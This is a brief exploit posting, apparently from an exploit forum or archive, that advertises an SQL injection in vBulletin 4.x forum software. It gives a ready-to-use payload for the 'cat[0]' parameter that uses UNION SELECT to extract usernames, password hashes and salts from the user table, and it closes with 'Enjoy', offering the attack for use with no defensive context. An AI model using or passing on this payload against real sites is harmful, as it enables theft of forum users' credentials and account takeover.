0 vBulletin 4.* SQL Injection

Work on all 4 version exept last one 4.1.3 :)

Video Link
http://www.youtube.com/watch?v=htGClYoBN9k

Exploit Code

&cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt) FROM user limit 1,1#

Enjoy